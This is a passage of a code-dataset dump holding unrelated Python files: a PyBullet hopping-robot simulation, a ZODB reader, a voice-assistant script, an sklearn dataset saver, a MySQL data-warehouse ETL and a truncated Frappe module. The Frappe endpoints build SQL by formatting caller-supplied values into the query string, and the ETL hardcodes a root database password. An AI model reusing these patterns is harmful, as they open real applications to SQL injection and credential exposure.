rgbaColor=[0.4,0.4,0.5,1])\n\n\n# bodyId=p.crefootIdtiBody(baseMass=1,baseCollisionShapeIndex = Body_1,baseVisualShapeIndex = sh_visBody,\n# basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\n\n# footID=p.createMultiBody(baseMass = 1,baseCollisionShapeIndex = sh_colFoot, \n# basePosition = [0,0,0.5],baseOrientation=startOrientation)\n\n# #----------------------INERTIA INCREASING PLATES-----------------------\n# cubeId3=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = 
[-0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId4=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId5=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,-0.5,1.5],baseOrientation=[0,0,0,1])\n# cubeId6=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId3=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [-0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId4=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId5=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = [0,-0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId6=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\n\n#Scenery e.g. an inclined box\nboxHalfLength = 2.5\nboxHalfWidth = 2.5\nboxHalfHeight = 0.2\nsh_colBox = p.createCollisionShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight])\nsh_visBox = p.createVisualShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight], rgbaColor=[0,0,0,1])\n\nblock=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [-2,0,-0.1],baseOrientation=[0.0,0.1,0.0,1])\nsth=0.15\nblock2=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox, baseVisualShapeIndex = sh_visBox,\n basePosition = [5.75,0.15,-0.2+1*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock3=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.33,0,-0.2+2*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock4=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.66,0.2,-0.2+3*sth],baseOrientation=[0.1,0.0,0.0,1])\nblock5=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.99,0.1,-0.2+4*sth],baseOrientation=[0.0,-0.1,0.0,1])\n\nbox11l=0.5\nbox11w=0.5\nbox11h=0.1\nsh_box11 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box11l,box11w,box11h])\nsth=0.15\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*k,-1+k/200,k*sth],baseOrientation=[0.0,0.0,0.0,1])\np.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10,-1,k*sth+0.01],baseOrientation=[0.0,0.0,0.0,1])\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10+k/200,-0.5+0.4*k,(k+10)*sth],baseOrientation=[0.0,0.0,0.0,1])\nbox14_1l=7\nbox14_1w=0.75\nbox11h=0.1\nsh_box14_1 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box14_1l,box14_1w,box11h])\nbox14_1=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box14_1,\n basePosition = [-0.3,3.1,1.4],baseOrientation=[0.0,-0.1,0.0,1])\n\n\n\np.setGravity(0,0,-10)\np.setRealTimeSimulation(1)\n#make to plane less slippery\np.changeDynamics(plId,-1,lateralFriction=10)\np.changeDynamics(block5,-1,lateralFriction=10)\np.changeDynamics(box14_1,-1,lateralFriction=10)\n\n#connections:\ncid_0= p.createConstraint(bodyId, -1 ,footId, -1 , p.JOINT_FIXED, jointAxis=[0,0,0],parentFramePosition=[0,0,0], childFramePosition=[0,0,1])\ncid4 = p.createConstraint(bodyId,-1,cubeId3,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0.25,0,0])\ncid5 = p.createConstraint(bodyId,-1,cubeId4,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[-0.25,0,0])\ncid6 = 
p.createConstraint(bodyId,-1,cubeId5,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0.25,0])\ncid7 = p.createConstraint(bodyId,-1,cubeId6,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,-0.25,0])\n\n\n# #simple simulation to start:\n# p.setTimeStep(0.001)\n# p.setRealTimeSimulation(1)\n\n\n#initiate:\npivot=[0,0,0,1]\ndecomprPhase=0\n\nJoints=p.getNumJoints(bodyId)\ncubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\nDes= cubeOrn\nEuler=p.getEulerFromQuaternion(cubeOrn)\n\nt=0\ntstr=0\nvx=0\nvy=0\nzgnd=0\njmp=0\nxgl=7\nygl=-1\n\n\ndestination=[]\nx_vel=[]\ny_vel=[]\nz_vel=[]\nz_pos=[]\nx_pos=[]\ny_pos=[]\n\n# while 1:\nfor i in range(1000):\n    p.resetDebugVisualizerCamera( cameraDistance=6, cameraYaw=-130+t/10, cameraPitch=-60, \n                                    cameraTargetPosition=[cubePos[0], cubePos[1], 0.25])\n    t+=1 \n    time.sleep(0.01)\n\n    keys = p.getKeyboardEvents()\n    if keys.get(65297): #Up\n        vx+=0.002\n    if keys.get(65298): #Down\n        vx-=0.002\n    if keys.get(65296): #Right\n        vy-=0.002\n    if keys.get(65295): #Left\n        vy+=0.002\n    if keys.get(97): #A\n        if jmp==0: \n            vx*=3\n            vy*=3\n            jmp=1\n    \n    if cubePos[0] > 3:  # '>' assumed here (original operator missing): switch the x-goal after passing x=3\n        xgl=-8\n    if xgl==-8 and cubePos[0]<6.5:\n        vy=-0.04\n    \n    #computing positions velocities, orientation angles, etc\n    cube_prev=cubePos\n    Euler_prev=Euler\n    cubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\n    vel_x_cube_pos=(cubePos[0]-cube_prev[0])/0.01\n    vel_y_cube_pos=(cubePos[1]-cube_prev[1])/0.01\n    vel_z_cube_pos=(cubePos[2]-cube_prev[2])/0.01\n    x_vel.append(vel_x_cube_pos)\n    y_vel.append(vel_y_cube_pos)\n    z_vel.append(vel_z_cube_pos)\n    z_pos.append(cubePos[2])\n    x_pos.append(cubePos[0])\n    y_pos.append(cubePos[1])\n\n    Euler=p.getEulerFromQuaternion(cubeOrn)\n    omega_x=(Euler[0]-Euler_prev[0])/0.01\n    omega_y=(Euler[1]-Euler_prev[1])/0.01\n\n    x_foot, dum=p.getBasePositionAndOrientation(footId)\n    if (vel_z_cube_pos>0 and decomprPhase==0):\n        decomprPhase=1\n        tstr=t \n        zgnd=x_foot[2]+0.05\n\n    if (x_foot[2]-zgnd>0.105 and decomprPhase==1):\n        decomprPhase=2\n        if jmp==1:\n            vx=vx/3\n            vy=vy/3\n            jmp=0\n    \n    if x_foot[2]-zgnd<0.105 and decomprPhase==2:\n        decomprPhase=0\n\n    if decomprPhase==1:\n        #decompressing: PD control on orientation of body during stance\n        DesEU=p.getEulerFromQuaternion(Des)\n        Des = p.getQuaternionFromEuler(DesEU + np.array([-0.07*omega_x-0.3*Euler[0] -0.15*(-(vel_y_cube_pos-vy)*np.cos(Euler[2])+(vel_x_cube_pos-vx)*np.sin(Euler[2])),\n                                                         -0.07*omega_y-0.3*Euler[1] -0.15*( (vel_x_cube_pos-vx)*np.cos(Euler[2])+(vel_y_cube_pos-vy)*np.sin(Euler[2])),0.0]))\n        if ((t-tstr)<8 and jmp==1): #thrust for a small time interval (increased spring force)\n            p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=1300)\n        elif ((t-tstr)<8):\n            p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=600)\n        else:\n            p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n    else:\n        #flight and compression: Reposition foot for next landing based on body horizontal velocity and orientation\n        if (x_foot[2]-zgnd>0.105):\n            Des = p.getQuaternionFromEuler(\n                [+0.15*(-(vel_y_cube_pos-0.0)*np.cos(Euler[2])+(vel_x_cube_pos-0.0)*np.sin(Euler[2])) + Euler[0],\n                 +0.15*( (vel_x_cube_pos-0.0)*np.cos(Euler[2])+(vel_y_cube_pos-0.0)*np.sin(Euler[2])) + Euler[1], 0.0])\n        \n        p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n    destination.append(Des)\n\np.disconnect()\n\n\nxrot=[]\nyrot=[]\nzrot=[]\nfor i in range(len(destination)):\n    print(p.getEulerFromQuaternion(destination[i]))\n    xrot.append(destination[i][0])\n    yrot.append(destination[i][1])\n    
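# note (added): these append the raw quaternion components of each stored Des, even\n    # though the figure titles below say Euler; getEulerFromQuaternion above prints the angles\n    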
zrot.append(destination[i][2])\n\nfig,axs=plt.subplots(7)\naxs[0].plot(xrot)\naxs[1].plot(yrot)\naxs[2].plot(zrot)\naxs[3].plot(x_vel)\naxs[4].plot(y_vel)\naxs[5].plot(z_vel)\naxs[6].plot(z_pos)\n\naxs[0].set_title(\"X rot Euler\")\naxs[1].set_title(\"y rot Euler\")\naxs[2].set_title(\"z rot Euler\")\naxs[3].set_title(\"X vel\")\naxs[4].set_title(\"y vel\")\naxs[5].set_title(\"z vel\")\naxs[6].set_title(\"z pos\")\n\n\n# plt.plot(destination)\nplt.show()\n\n","repo_name":"anushtup-nandy/Hopper_robot","sub_path":"Jumping_robot_sim.py","file_name":"Jumping_robot_sim.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9771950446","text":"from ZODB import FileStorage,DB\nimport transaction\nfrom modelo import Compania\nstorage = FileStorage.FileStorage('zodb/meubd.fs')\nbanco=DB(storage)\nconnection=banco.open()\nroot=connection.root()\n\n# percorrer as pessoas\nfor pe in root['empresas']:\n print(pe)\n\nconnection.close()","repo_name":"NaTTaNMendes/POO2","sub_path":"E9/OLHARDADOSZODB.PY","file_name":"OLHARDADOSZODB.PY","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25805445277","text":"from pip import main\r\nimport pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport webbrowser\r\nimport os\r\n\r\n\r\nengine=pyttsx3.init('sapi5')\r\nvoices=engine.getProperty('voices')\r\n# print(voices[1].id)\r\nengine.setProperty('voice',voices[1].id)\r\n\r\n\r\n#SPEAK FUNCTION\r\n# ---------------------------------------------------------------------------------------------------------\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n#WISH ME FUNCTION\r\n# ----------------------------------------------------------------------------------------------------------\r\ndef wishMe():\r\n hour = int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon!\") \r\n\r\n else:\r\n speak(\"Good Evening!\") \r\n\r\n speak(\"I am Jarvis Sir. 
Please tell me how may I help you\")    \r\n\r\n\r\n#TAKE COMMAND FUNCTION\r\n# ------------------------------------------------------------------------------------------------------\r\ndef takecommand():\r\n    #takes microphone input from user and return string output\r\n    r = sr.Recognizer()\r\n    with sr.Microphone() as source:\r\n        print(\"Listening...\")\r\n        r.pause_threshold = 1 \r\n        #seconds of non speaking audio before a phrase is considered complete\r\n        audio = r.listen(source)\r\n    try:\r\n        print(\"Recognizing...\")    \r\n        query = r.recognize_google(audio, language='en-in')\r\n        print(f\"User said: {query}\\n\")\r\n\r\n    except Exception as e:\r\n        # print(e)  \r\n        print(\"Say that again please...\")  \r\n        return \"None\"\r\n    return query    \r\n\r\n\r\n#EMAIL FUNCTION (module level, so the main loop below can actually call it)\r\n#----------------------------------------------------------------------------------------------------------\r\ndef sendEmail(to, content):\r\n    import smtplib  # not imported at the top of this file, so import it locally\r\n    server = smtplib.SMTP('smtp.gmail.com', 587)\r\n    server.ehlo()\r\n    server.starttls()\r\n    server.login('youremail@gmail.com', 'your-password')\r\n    server.sendmail('youremail@gmail.com', to, content)\r\n    server.close()\r\n\r\n\r\n#MAIN FUNCTION\r\n#--------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n    # speak(\"shalini is good girl\")\r\n    wishMe()\r\n\r\n    while True:\r\n        query = takecommand().lower()\r\n        #Logic for executing tasks based on query\r\n\r\n#--------------------------------------------------------------------------------------------------------------\r\n        if 'wikipedia' in query:\r\n            speak('Searching Wikipedia...')\r\n            query = query.replace(\"wikipedia\", \"\")\r\n            results = wikipedia.summary(query, sentences=5)\r\n            #jarvis reads 5 sentences\r\n            speak(\"According to Wikipedia....................\")\r\n            print(results)\r\n            speak(results)\r\n\r\n        elif 'open youtube' in query:\r\n            webbrowser.open(\"youtube.com\")\r\n\r\n        elif 'open google' in query:\r\n            webbrowser.open(\"google.com\")\r\n\r\n        elif 'open stackoverflow' in query:\r\n            webbrowser.open(\"stackoverflow.com\")  \r\n        \r\n        elif 'open hackerrank' in query:  # query is lower-cased above, so match in lower case\r\n            webbrowser.open(\"hackerrank.com\")   \r\n        \r\n        elif 'play music' in query:\r\n            music_dir = 'G:\\\\Favouritesongs'\r\n            #path of music folder\r\n            songs = os.listdir(music_dir)\r\n            # print(songs)    \r\n            os.startfile(os.path.join(music_dir, songs[0]))\r\n            #plays the 1st song of the playlist; use the random module to pick a random one\r\n\r\n        elif 'the time' in query:\r\n            strTime = datetime.datetime.now().strftime(\"%H:%M:%S\")    \r\n            speak(f\"Sir, the time is {strTime}\")\r\n\r\n        \r\n        elif 'open code' in query:\r\n            codePath = \"C:\\\\Users\\\\HP\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n            os.startfile(codePath)\r\n            #opening the file\r\n\r\n        elif 'email to harry' in query:\r\n            try:\r\n                speak(\"What should I say?\")\r\n                content = takecommand()\r\n                to = \"harryyourEmail@gmail.com\"    \r\n                sendEmail(to, content)\r\n                speak(\"Email has been sent!\")\r\n            except Exception as e:\r\n                print(e)\r\n                speak(\"Sorry my friend harry bhai. 
I am not able to send this email\") \r\n #this email only work when we change our security to less secure app \r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n","repo_name":"shalini0517/Jarvis-AI-desktop","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"10048269935","text":"\"\"\" \n:author: Tal Peretz\n:date: 11/11/2016\n:TL;DR: this module purpose is generating datasets for pyds tests\n\"\"\"\n\nimport os\n\nimport pandas as pd\nimport sklearn.datasets\n\nsave_attribute_to_file_extension = {'to_excel': 'xls', 'to_html': 'html', 'to_json': 'json', 'to_pickle': 'pickle',\n 'to_stata': 'stata', 'to_sql': 'sql', 'to_csv': 'csv', }\nDATASETS_PATH = os.path.abspath(\"\")\n\ndatasets = (\n sklearn.datasets.load_boston(),\n sklearn.datasets.fetch_california_housing())\n\n\ndef save_datasets(datasets_collection):\n for i, dataset in enumerate(datasets_collection):\n dataset_name = dataset['DESCR'].split('\\n')[0]\n # build path variable, check if exists, if not create it\n path = DATASETS_PATH + '/' + dataset_name + '/'\n file_name = 'train.%s' % tuple(save_attribute_to_file_extension.values())[i]\n if not os.path.exists(path):\n os.makedirs(path)\n\n # build the dataframe in the form of data columns and target variable in one DataFrame\n df = pd.concat([pd.DataFrame(data=dataset['data'], columns=dataset['feature_names']),\n pd.Series(data=dataset['target'], name='target')], axis=1)\n\n # save the resulting DataFrame in a format from save_attribute_to_file_extension\n getattr(df, tuple(save_attribute_to_file_extension.keys())[i])(path + file_name)\n\n\nif __name__ == '__main__':\n save_datasets(datasets)\n","repo_name":"talperetz/pyds","sub_path":"tests/resources/datasets/save_datasets.py","file_name":"save_datasets.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"10449781960","text":"import re\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\ndef remove_special_chars(x):\n return re.sub(r\"[^a-zA-Z0-9]+\", ' ', x)\n\n\ndef transform_str(value):\n if type(value) is not str:\n return None\n new = remove_special_chars(value)\n return new.upper()\n\n\ndef ingest_dim_local(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_local\"\n\n results = source_connection.execute(\"\"\"\n (SELECT\n customer_zip_code_prefix as zip_code_prefix,\n customer_city as city,\n customer_state as state\n FROM customer)\n UNION\n (SELECT\n seller_zip_code_prefix as zip_code_prefix,\n seller_city as city,\n seller_state as state\n FROM seller);\n\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['zip_code_prefix'], keep='first', inplace=True)\n data[\"city\"] = data[\"city\"].map(transform_str)\n data[\"state\"] = data[\"state\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_product(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_product\"\n\n results = source_connection.execute(\"\"\"\n SELECT\n product.product_id as original_id,\n product.product_category_name as category_name\n FROM product;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data[\"category_name\"] = 
data[\"category_name\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine):\n source_connection = source_engine.connect()\n\n results = source_connection.execute(\"\"\"\n SELECT\n order_id as order_id,\n payment_sequential as sequential,\n payment_type as type,\n payment_installments as installments,\n payment_value as value\n FROM order_payment;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n order_payment = data[['order_id']].copy()\n order_payment.drop_duplicates(subset=['order_id'], keep='first', inplace=True)\n order_payment.to_sql(name=\"dim_order_payment\", con=dw_engine, if_exists='append', index=False)\n order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, order_payment, on='order_id')\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n payment = data[['order_payment_id', 'sequential', 'type', 'installments', 'value']].copy()\n payment.to_sql(name=\"dim_payment\", con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_seller(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_seller\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n seller_id as original_id,\n seller_zip_code_prefix as zip_code_prefix\n FROM seller;\n \"\"\")\n seller = pd.DataFrame(results.fetchall())\n seller.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(seller, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_customer(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_customer\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n customer_id as original_id,\n customer_unique_id as unique_id,\n customer_zip_code_prefix as zip_code_prefix\n FROM customer;\n \"\"\")\n customer = pd.DataFrame(results.fetchall())\n customer.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(customer, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id', 'unique_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_date(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_date\"\n\n results = source_connection.execute(\"\"\"\n (SELECT \n DAY(order_purchase_timestamp) as day,\n MONTH(order_purchase_timestamp) as month,\n YEAR(order_purchase_timestamp) as year,\n DATE_FORMAT(order_purchase_timestamp, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_purchase_timestamp IS NOT NULL)\n UNION\n (SELECT \n DAY(order_approved_at) as day,\n MONTH(order_approved_at) as month,\n YEAR(order_approved_at) as year,\n DATE_FORMAT(order_approved_at, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_approved_at IS NOT NULL)\n UNION\n (SELECT \n DAY(order_delivered_carrier_date) as day,\n MONTH(order_delivered_carrier_date) as month,\n YEAR(order_delivered_carrier_date) as year,\n DATE_FORMAT(order_delivered_carrier_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_carrier_date IS NOT NULL)\n UNION\n 
(SELECT \n DAY(order_delivered_customer_date) as day,\n MONTH(order_delivered_customer_date) as month,\n YEAR(order_delivered_customer_date) as year,\n DATE_FORMAT(order_delivered_customer_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_customer_date IS NOT NULL)\n UNION\n (SELECT \n DAY(order_estimated_delivery_date) as day,\n MONTH(order_estimated_delivery_date) as month,\n YEAR(order_estimated_delivery_date) as year,\n DATE_FORMAT(order_estimated_delivery_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_estimated_delivery_date IS NOT NULL);\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['str'], keep='first', inplace=True)\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dims():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_dim_date(source_engine, dw_engine)\n ingest_dim_local(source_engine, dw_engine)\n ingest_dim_product(source_engine, dw_engine)\n ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine)\n ingest_dim_seller(source_engine, dw_engine)\n ingest_dim_customer(source_engine, dw_engine)\n\n\ndef ingest_fact_order_item(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"fact_order_item\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n order_item.order_item_id as original_id,\n orders.order_id as order_id,\n orders.customer_id as customer_original_id,\n orders.order_status as status,\n \n DATE_FORMAT(orders.order_purchase_timestamp, \"%%Y/%%m/%%d\") as purchase_timestamp_str,\n DATE_FORMAT(orders.order_approved_at, \"%%Y/%%m/%%d\") as approved_at_str,\n DATE_FORMAT(orders.order_delivered_carrier_date, \"%%Y/%%m/%%d\") as delivered_carrier_date_str,\n DATE_FORMAT(orders.order_delivered_customer_date, \"%%Y/%%m/%%d\") as delivered_customer_date_str,\n DATE_FORMAT(orders.order_estimated_delivery_date, \"%%Y/%%m/%%d\") as estimated_delivery_date_str,\n \n order_item.price as price,\n order_item.product_id as product_original_id,\n order_item.seller_id as seller_original_id\n FROM orders\n INNER JOIN order_item on order_item.order_id = orders.order_id;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n dim_date = pd.read_sql_table(\"dim_date\", con=dw_engine)\n dim_customer = pd.read_sql_table(\"dim_customer\", con=dw_engine)\n dim_product = pd.read_sql_table(\"dim_product\", con=dw_engine)\n dim_seller = pd.read_sql_table(\"dim_seller\", con=dw_engine)\n dim_order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, dim_customer, left_on=['customer_original_id'], right_on=['original_id'])\n data.rename({'id': 'customer_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_product, left_on=['product_original_id'], right_on=['original_id'])\n data.rename({'id': 'product_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_seller, left_on=['seller_original_id'], right_on=['original_id'])\n data.rename({'id': 'seller_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['purchase_timestamp_str'], right_on=['str'])\n data.rename({'id': 'purchase_timestamp_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['approved_at_str'], right_on=['str']) #\n data.rename({'id': 
'approved_at_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_carrier_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_carrier_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['delivered_customer_date_str'], right_on=['str']) #\n data.rename({'id': 'delivered_customer_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_date, how='left', left_on=['estimated_delivery_date_str'], right_on=['str'])\n data.rename({'id': 'estimated_delivery_date_id'}, axis=1, inplace=True)\n\n data = pd.merge(data, dim_order_payment, how='left', on='order_id') #\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n\n data.rename({'original_id_x': 'original_id'}, axis=1, inplace=True)\n fact_order_item = data[\n ['order_id', 'product_id', 'seller_id', 'customer_id', 'original_id', 'order_payment_id', 'price', 'status',\n 'purchase_timestamp_date_id', 'approved_at_date_id', 'delivered_carrier_date_id', 'delivered_customer_date_id',\n 'estimated_delivery_date_id']].copy()\n fact_order_item.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_facts():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n\n ingest_fact_order_item(source_engine, dw_engine)\n\n\ndef delete_all():\n dw_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/dw\", echo=False)\n dw_connection = dw_engine.connect()\n dw_connection.execute(\"DELETE FROM fact_order_item;\")\n dw_connection.execute(\"DELETE FROM dim_customer;\")\n dw_connection.execute(\"DELETE FROM dim_seller;\")\n dw_connection.execute(\"DELETE FROM dim_payment;\")\n dw_connection.execute(\"DELETE FROM dim_order_payment;\")\n dw_connection.execute(\"DELETE FROM dim_product;\")\n dw_connection.execute(\"DELETE FROM dim_local;\")\n dw_connection.execute(\"DELETE FROM dim_date;\")\n\n\nif __name__ == \"__main__\":\n delete_all()\n ingest_dims()\n ingest_facts()\n","repo_name":"CaioSGoncalves/ECommerceDW","sub_path":"1_dw_ingestion.py","file_name":"1_dw_ingestion.py","file_ext":"py","file_size_in_byte":11225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"18618206368","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe import _\nimport frappe.defaults\nimport frappe.permissions\nfrom frappe.core.doctype.user.user import get_system_users\nfrom frappe.utils.csvutils import UnicodeWriter, read_csv_content_from_uploaded_file\nfrom frappe.defaults import clear_default\nimport datetime\n\ndef formated_date(date_str):\n\treturn datetime.datetime.strptime(date_str , '%d-%m-%Y').strftime('%Y-%m-%d')\n\t \n@frappe.whitelist()\ndef get_data(from_date=None,to_date=None,currency=None):\n\tfrappe.errprint(currency)\n\tdata_dict = {'cols':'name ,net_total', 'tab':'`tabSales Order`', 'cond_col': 'delivery_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date,currency)\t\t\t\t\n\treturn{\n\t\t\"sales_order_total\": make_query(data_dict)\n\t}\n\t\n@frappe.whitelist()\ndef get_jv_data(from_date=None,to_date=None):\n\tdata_dict = {'cols':'name,total_credit', 'tab':'`tabJournal Voucher`', 'cond_col': 'posting_date','cncy':'currency'}\n\tmake_cond(data_dict, from_date, to_date)\t\t\t\t\n\treturn{\n\t\t\"order_total\": make_query(data_dict)\n\t}\n\t\n\ndef make_cond(data_dict, 
from_date=None,to_date=None,currency=None):\n\t\n\tif from_date and to_date and currency:\n\t\tfrappe.errprint(\"in the else\")\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' and %(cncy)s = '%(currency)s'\n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date),'currency':currency, 'cncy':data_dict.get('cncy')}\n\n\telif from_date and to_date:\n\t\tdata_dict['cond'] = \"\"\" where %(cond_col)s between '%(from_date)s' and '%(to_date)s' \n\t\t\t\"\"\"%{'cond_col': data_dict.get('cond_col'), 'from_date': formated_date(from_date),\n\t\t\t\t\t'to_date': formated_date(to_date)}\n\telse:\n\t\tdata_dict['cond'] = ' '\n\n\ndef make_query(data_dict):\n\tstmt=\"select %(cols)s from %(tab)s %(cond)s\"%data_dict\n\t\n\treturn frappe.db.sql(\"select %(cols)s from %(tab)s %(cond)s\"%data_dict,debug=1)\n\n@frappe.whitelist()\ndef get_activities():\n\tdbname=frappe.db.sql(\"\"\"select site_name from `tabSubAdmin Info` where active=1\"\"\",as_dict=1)\n\tlst=[]\n\tqry_srt='select subject,site_name 